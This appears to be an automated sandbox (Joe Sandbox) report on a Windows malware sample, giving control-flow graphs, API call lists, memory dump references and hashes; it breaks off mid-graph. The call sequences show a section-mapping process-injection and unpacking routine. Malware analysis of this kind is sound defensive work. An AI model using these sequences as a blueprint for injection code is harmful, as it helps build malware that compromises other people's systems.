415b08 BuildCommDCBA 3347->3349 3350 415b43 3348->3350 3351 415b21 WritePrivateProfileStringA FreeEnvironmentStringsA 3348->3351 3349->3350 3353 415bca 3350->3353 3354 415b79 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3350->3354 3355 415ad0 3350->3355 3351->3350 3353->3341 3353->3342 3354->3350 3358 415a60 3355->3358 3359 415a89 3358->3359 3360 415a7c SetEvent 3358->3360 3359->3350 3360->3359 3465 401613 3466 40161c 3465->3466 3467 4016af NtDuplicateObject 3466->3467 3476 4017cb 3466->3476 3468 4016cc NtCreateSection 3467->3468 3467->3476 3469 4016f2 NtMapViewOfSection 3468->3469 3470 40174c NtCreateSection 3468->3470 3469->3470 3471 401715 NtMapViewOfSection 3469->3471 3472 401778 3470->3472 3470->3476 3471->3470 3473 401733 3471->3473 3474 401782 NtMapViewOfSection 3472->3474 3472->3476 3473->3470 3475 4017a9 NtMapViewOfSection 3474->3475 3474->3476 3475->3476 3361 403257 3362 4031f0 RtlCreateUserThread NtTerminateProcess 3361->3362 3364 403261 3361->3364 3363 403246 3362->3363 3508 402ed9 3510 402e8d 3508->3510 3509 40304f 3510->3508 3510->3509 3511 4019e0 15 API calls 3510->3511 3511->3509 3484 2cc9c92 3485 2cc9c98 3484->3485 3488 2cc9ced 3484->3488 3486 2cca443 3 API calls 3485->3486 3487 2cc9cbb 3486->3487 3614 2c3092b GetPEB 3615 2c30972 3614->3615 3588 4019eb 3589 4019f0 3588->3589 3590 401a29 Sleep 3589->3590 3591 4014fb 7 API calls 3590->3591 3592 401a44 3591->3592 3593 4015fb 7 API calls 3592->3593 3594 401a55 3592->3594 3593->3594 3400 2cc9ca3 3401 2cc9cb2 3400->3401 3404 2cca443 3401->3404 3406 2cca45e 3404->3406 3405 2cca467 CreateToolhelp32Snapshot 3405->3406 3407 2cca483 Module32First 3405->3407 3406->3405 3406->3407 3408 2cca492 3407->3408 3410 2cc9cbb 3407->3410 3411 2cca102 3408->3411 3412 2cca12d 3411->3412 3413 2cca13e VirtualAlloc 3412->3413 3414 2cca176 3412->3414 3413->3414 3414->3414 3512 4014fa 3513 40150c 3512->3513 3514 4016af NtDuplicateObject 3513->3514 3523 4015ea 3513->3523 3515 4016cc NtCreateSection 3514->3515 3514->3523 3516 4016f2 NtMapViewOfSection 3515->3516 3517 40174c NtCreateSection 3515->3517 3516->3517 3518 401715 NtMapViewOfSection 3516->3518 3519 401778 3517->3519 3517->3523 3518->3517 3520 401733 3518->3520 3521 401782 NtMapViewOfSection 3519->3521 3519->3523 3520->3517 3522 4017a9 NtMapViewOfSection 3521->3522 3521->3523 3522->3523 3365 402fbe 3366 402fc3 3365->3366 3368 40304f 3366->3368 3369 4019e0 3366->3369 3370 4019e7 3369->3370 3371 401a29 Sleep 3370->3371 3376 4014fb 3371->3376 3373 401a44 3375 401a55 3373->3375 3388 4015fb 3373->3388 3375->3368 3377 40150c 3376->3377 3378 4015ea 3377->3378 3379 4016af NtDuplicateObject 3377->3379 3378->3373 3379->3378 3380 4016cc NtCreateSection 3379->3380 3381 4016f2 NtMapViewOfSection 3380->3381 3382 40174c NtCreateSection 3380->3382 3381->3382 3383 401715 NtMapViewOfSection 3381->3383 3382->3378 3384 401778 3382->3384 3383->3382 3385 401733 3383->3385 3384->3378 3386 401782 NtMapViewOfSection 3384->3386 3385->3382 3386->3378 3387 4017a9 NtMapViewOfSection 3386->3387 3387->3378 3389 40160b 3388->3389 3390 4016af NtDuplicateObject 3389->3390 3399 4017cb 3389->3399 3391 4016cc NtCreateSection 3390->3391 3390->3399 3392 4016f2 NtMapViewOfSection 3391->3392 3393 40174c NtCreateSection 3391->3393 3392->3393 3394 401715 NtMapViewOfSection 3392->3394 3395 401778 3393->3395 3393->3399 3394->3393 3396 401733 3394->3396 3397 401782 NtMapViewOfSection 3395->3397 3395->3399 3396->3393 3398 4017a9 NtMapViewOfSection 3397->3398 3397->3399 3398->3399 3399->3375 3415 2c3003c 3416 2c30049 3415->3416 3428 2c30e0f SetErrorMode SetErrorMode 3416->3428 3421 2c30265 3422 2c302ce VirtualProtect 3421->3422 3424 2c3030b 3422->3424 3423 2c30439 VirtualFree 3427 2c304be LoadLibraryA 3423->3427 3424->3423 3426 2c308c7 3427->3426 3429 2c30223 3428->3429 3430 2c30d90 3429->3430 3431 2c30dad 3430->3431 3432 2c30dbb GetPEB 3431->3432 3433 2c30238 VirtualAlloc 3431->3433 3432->3433 3433->3421

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 415c90-415cb8 2 415cc0-415cc7 0->2 3 415cc9-415ccb 2->3 4 415ccf-415cd5 2->4 3->4 5 415cd7-415ce1 4->5 6 415ce6-415cf0 4->6 5->6 7 415cf2-415cfe 6->7 8 415d08-415d0f 6->8 7->8 8->2 9 415d11-415d19 8->9 11 415d20-415d26 9->11 12 415d34-415d3b 11->12 13 415d28-415d2e 11->13 14 415d41-415d48 12->14 15 415d3d 12->15 13->12 14->11 16 415d4a-415d51 14->16 15->14 17 415e80-415e8e 16->17 18 415d57-415e68 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 415e90-415e9e SetCommState 17->19 22 415e71-415e7d 18->22 23 415e6a-415e6b PulseEvent 18->23 24 415ea0-415ea7 19->24 25 415ea9-415eb0 19->25 22->17 23->22 24->19 24->25 27 415f76-415f85 call 4158e0 25->27 28 415eb6-415f70 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->28 33 415f87-415f98 27->33 34 415fbd-415fc8 LoadLibraryA call 415910 27->34 28->27 35 415fa0-415fb0 33->35 38 415fcd-415fde call 415c00 34->38 39 415fb2 35->39 40 415fb8-415fbb 35->40 45 415fe0-415fe7 38->45 39->40 40->34 40->35 46 415ff3-415ff9 45->46 47 415fe9-415fef 45->47 49 416000-416007 46->49 50 415ffb call 415900 46->50 47->46 53 416016-41601d 49->53 54 416009-416010 InterlockedDecrement 49->54 50->49 53->45 56 41601f-41602f 53->56 54->53 57 416030-416040 56->57 58 416042 57->58 59 416049-41604c 57->59 58->59 59->57 60 41604e-416059 59->60 61 416060-416065 60->61 62 416067-41606d 61->62 63 41606f-416075 61->63 62->63 64 416077-416084 62->64 63->61 63->64
                                                                  APIs
                                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415D62
                                                                  • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415D7B
                                                                  • FindAtomW.KERNEL32(00000000), ref: 00415D82
                                                                  • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415D8A
                                                                  • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415DA2
                                                                  • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415DC9
                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00415DD1
                                                                  • GetVersionExW.KERNEL32(?), ref: 00415DDE
                                                                  • DisconnectNamedPipe.KERNEL32(?), ref: 00415DF1
                                                                  • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415E36
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415E45
                                                                  • LCMapStringA.KERNEL32(00000000,00000000,004183C0,00000000,?,00000000), ref: 00415E5B
                                                                  • PulseEvent.KERNEL32(00000000), ref: 00415E6B
                                                                  • SetCommState.KERNELBASE(00000000,00000000), ref: 00415E94
                                                                  • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415EC5
                                                                  • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415ED6
                                                                  • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415EDE
                                                                  • GetTimeFormatW.KERNEL32(00000000,00000000,?,004183EC,?,00000000), ref: 00415F1E
                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00415F25
                                                                  • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415F2B
                                                                  • GetBinaryType.KERNEL32(0041842C,?), ref: 00415F3D
                                                                  • LoadLibraryA.KERNELBASE(00418438), ref: 00415FC2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2767929246.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_40b000_ajvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
                                                                  • String ID: k`$}$
                                                                  • API String ID: 2545807588-956986773
                                                                  • Opcode ID: ee9f9be1eea3864904fa2604a43f6a26db7559f4d69b73e0e97a970f018646e0
                                                                  • Instruction ID: 500cb7f68f8a5735401a0a6ba47bc000e865cb3074ff61a672bf7834970157e8
                                                                  • Opcode Fuzzy Hash: ee9f9be1eea3864904fa2604a43f6a26db7559f4d69b73e0e97a970f018646e0
                                                                  • Instruction Fuzzy Hash: 96A1E271845A24DBC720DB65EC58ADF7B78EF8D351F40406AF50AA7290DB381A81CBED

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 151 4014fb-401504 152 40151b 151->152 153 40150c-40152e 151->153 152->153 158 401531-401545 call 40127e 153->158 163 40154a-401555 158->163 163->163 164 401558-40155a 163->164 165 40155d-401572 164->165 168 401574-401579 165->168 170 4015c4 168->170 171 40157b 168->171 174 4015c6 170->174 175 40162f-401632 170->175 172 4015f6-4015f8 171->172 173 40157d-40159a 171->173 185 40159d 173->185 186 40152f-401530 173->186 174->168 179 4015c8-4015cd 174->179 176 401634-401659 call 40127e 175->176 177 4016a5-4016a6 175->177 187 40165b 176->187 188 40165e-401663 176->188 183 4016a7-4016a9 177->183 184 40162d 177->184 180 401648-401659 179->180 181 4015cf-4015d0 179->181 180->187 180->188 189 4015d2-4015e8 181->189 190 4015b6-4015b9 181->190 192 401987 183->192 193 4016af-4016c6 NtDuplicateObject 183->193 184->175 185->165 194 40159f-4015a1 185->194 186->158 187->188 215 401989-401991 188->215 216 401669-40167a 188->216 196 4015ea-4015f5 189->196 197 40157c 189->197 190->176 202 4015bb-4015c3 190->202 195 401996-4019dd call 40127e 192->195 193->192 198 4016cc-4016f0 NtCreateSection 193->198 200 4015a3 194->200 201 40161c 194->201 196->172 197->173 204 4015a9-4015b4 197->204 205 4016f2-401713 NtMapViewOfSection 198->205 206 40174c-401772 NtCreateSection 198->206 208 40161e-40162c 200->208 209 4015a5-4015a6 200->209 201->208 202->170 204->190 205->206 212 401715-401731 NtMapViewOfSection 205->212 206->192 214 401778-40177c 206->214 208->176 219 401643 208->219 209->204 212->206 218 401733-401749 212->218 214->192 220 401782-4017a3 NtMapViewOfSection 214->220 215->188 215->195 216->192 228 401680-4016a3 216->228 218->206 219->176 220->192 223 4017a9-4017c5 NtMapViewOfSection 220->223 223->192 227 4017cb call 4017d0 223->227 228->183
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                  • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                                  • Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                  • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 237 4015fb-401604 238 401615 237->238 239 40160b-401611 237->239 238->239 240 401618-40162c 238->240 239->240 244 401643 240->244 245 401634-401659 call 40127e 240->245 244->245 250 40165b 245->250 251 40165e-401663 245->251 250->251 253 401989-401991 251->253 254 401669-40167a 251->254 253->251 257 401996-4019dd call 40127e 253->257 258 401680-4016a9 254->258 259 401987 254->259 258->259 266 4016af-4016c6 NtDuplicateObject 258->266 259->257 266->259 268 4016cc-4016f0 NtCreateSection 266->268 270 4016f2-401713 NtMapViewOfSection 268->270 271 40174c-401772 NtCreateSection 268->271 270->271 273 401715-401731 NtMapViewOfSection 270->273 271->259 275 401778-40177c 271->275 273->271 276 401733-401749 273->276 275->259 278 401782-4017a3 NtMapViewOfSection 275->278 276->271 278->259 280 4017a9-4017c5 NtMapViewOfSection 278->280 280->259 283 4017cb call 4017d0 280->283
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                  • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                                  • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                  • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 285 401613-40162c 289 401643 285->289 290 401634-401659 call 40127e 285->290 289->290 295 40165b 290->295 296 40165e-401663 290->296 295->296 298 401989-401991 296->298 299 401669-40167a 296->299 298->296 302 401996-4019dd call 40127e 298->302 303 401680-4016a9 299->303 304 401987 299->304 303->304 311 4016af-4016c6 NtDuplicateObject 303->311 304->302 311->304 313 4016cc-4016f0 NtCreateSection 311->313 315 4016f2-401713 NtMapViewOfSection 313->315 316 40174c-401772 NtCreateSection 313->316 315->316 318 401715-401731 NtMapViewOfSection 315->318 316->304 320 401778-40177c 316->320 318->316 321 401733-401749 318->321 320->304 323 401782-4017a3 NtMapViewOfSection 320->323 321->316 323->304 325 4017a9-4017c5 NtMapViewOfSection 323->325 325->304 328 4017cb call 4017d0 325->328
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                  • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                                  • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                  • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 330 401606-401607 330->330 331 401609 330->331 332 40160b-40162c 331->332 333 40163c-401659 call 40127e 331->333 343 401643 332->343 344 401634-401639 332->344 340 40165b 333->340 341 40165e-401663 333->341 340->341 346 401989-401991 341->346 347 401669-40167a 341->347 343->344 344->333 346->341 350 401996-4019dd call 40127e 346->350 351 401680-4016a9 347->351 352 401987 347->352 351->352 359 4016af-4016c6 NtDuplicateObject 351->359 352->350 359->352 361 4016cc-4016f0 NtCreateSection 359->361 363 4016f2-401713 NtMapViewOfSection 361->363 364 40174c-401772 NtCreateSection 361->364 363->364 366 401715-401731 NtMapViewOfSection 363->366 364->352 368 401778-40177c 364->368 366->364 369 401733-401749 366->369 368->352 371 401782-4017a3 NtMapViewOfSection 368->371 369->364 371->352 373 4017a9-4017c5 NtMapViewOfSection 371->373 373->352 376 4017cb call 4017d0 373->376
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectView
                                                                  • String ID:
                                                                  • API String ID: 1652636561-0
                                                                  • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                  • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                                  • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                  • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 378 401627-40162c 382 401643 378->382 383 401634-401659 call 40127e 378->383 382->383 388 40165b 383->388 389 40165e-401663 383->389 388->389 391 401989-401991 389->391 392 401669-40167a 389->392 391->389 395 401996-4019dd call 40127e 391->395 396 401680-4016a9 392->396 397 401987 392->397 396->397 404 4016af-4016c6 NtDuplicateObject 396->404 397->395 404->397 406 4016cc-4016f0 NtCreateSection 404->406 408 4016f2-401713 NtMapViewOfSection 406->408 409 40174c-401772 NtCreateSection 406->409 408->409 411 401715-401731 NtMapViewOfSection 408->411 409->397 413 401778-40177c 409->413 411->409 414 401733-401749 411->414 413->397 416 401782-4017a3 NtMapViewOfSection 413->416 414->409 416->397 418 4017a9-4017c5 NtMapViewOfSection 416->418 418->397 421 4017cb call 4017d0 418->421
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                                  • Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
                                                                  • Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                                  • Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 423 401641-401659 call 40127e 430 40165b 423->430 431 40165e-401663 423->431 430->431 433 401989-401991 431->433 434 401669-40167a 431->434 433->431 437 401996-4019dd call 40127e 433->437 438 401680-4016a9 434->438 439 401987 434->439 438->439 446 4016af-4016c6 NtDuplicateObject 438->446 439->437 446->439 448 4016cc-4016f0 NtCreateSection 446->448 450 4016f2-401713 NtMapViewOfSection 448->450 451 40174c-401772 NtCreateSection 448->451 450->451 453 401715-401731 NtMapViewOfSection 450->453 451->439 455 401778-40177c 451->455 453->451 456 401733-401749 453->456 455->439 458 401782-4017a3 NtMapViewOfSection 455->458 456->451 458->439 460 4017a9-4017c5 NtMapViewOfSection 458->460 460->439 463 4017cb call 4017d0 460->463
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                  • Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
                                                                  • Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                  • Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 466 403103-403127 467 403246-40324b 466->467 468 40312d-403145 466->468 468->467 469 40314b-40315c 468->469 470 40315e-403167 469->470 471 40316c-40317a 470->471 471->471 472 40317c-403183 471->472 473 4031a5-4031ac 472->473 474 403185-4031a4 472->474 475 4031ce-4031d1 473->475 476 4031ae-4031cd 473->476 474->473 477 4031d3-4031d6 475->477 478 4031da 475->478 476->475 477->478 479 4031d8 477->479 478->470 480 4031dc-4031e1 478->480 479->480 480->467 481 4031e3-4031e6 480->481 481->467 482 4031e8-403243 RtlCreateUserThread NtTerminateProcess 481->482 482->467
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcessTerminateThreadUser
                                                                  • String ID:
                                                                  • API String ID: 1921587553-0
                                                                  • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                  • Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
                                                                  • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                  • Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 484 403257-40325f 485 4031f0-403243 RtlCreateUserThread NtTerminateProcess 484->485 486 403261-40327f 484->486 487 403246-40324b 485->487 492 403281 486->492 493 403286-403290 486->493 492->493 494 403283-403285 492->494 495 403292 493->495 496 403298-4032ba call 4012ec 493->496 494->493 495->496 498 403293-403297 495->498 502 4032be 496->502 502->502
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcessTerminateThreadUser
                                                                  • String ID:
                                                                  • API String ID: 1921587553-0
                                                                  • Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                  • Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
                                                                  • Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                  • Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 66 2c3003c-2c30047 67 2c30049 66->67 68 2c3004c-2c30263 call 2c30a3f call 2c30e0f call 2c30d90 VirtualAlloc 66->68 67->68 83 2c30265-2c30289 call 2c30a69 68->83 84 2c3028b-2c30292 68->84 89 2c302ce-2c303c2 VirtualProtect call 2c30cce call 2c30ce7 83->89 86 2c302a1-2c302b0 84->86 88 2c302b2-2c302cc 86->88 86->89 88->86 95 2c303d1-2c303e0 89->95 96 2c303e2-2c30437 call 2c30ce7 95->96 97 2c30439-2c304b8 VirtualFree 95->97 96->95 99 2c305f4-2c305fe 97->99 100 2c304be-2c304cd 97->100 103 2c30604-2c3060d 99->103 104 2c3077f-2c30789 99->104 102 2c304d3-2c304dd 100->102 102->99 106 2c304e3-2c30505 102->106 103->104 109 2c30613-2c30637 103->109 107 2c307a6-2c307b0 104->107 108 2c3078b-2c307a3 104->108 117 2c30517-2c30520 106->117 118 2c30507-2c30515 106->118 110 2c307b6-2c307cb 107->110 111 2c3086e-2c308be LoadLibraryA 107->111 108->107 112 2c3063e-2c30648 109->112 114 2c307d2-2c307d5 110->114 116 2c308c7-2c308f9 111->116 112->104 115 2c3064e-2c3065a 112->115 119 2c307d7-2c307e0 114->119 120 2c30824-2c30833 114->120 115->104 121 2c30660-2c3066a 115->121 124 2c30902-2c3091d 116->124 125 2c308fb-2c30901 116->125 126 2c30526-2c30547 117->126 118->126 127 2c307e2 119->127 128 2c307e4-2c30822 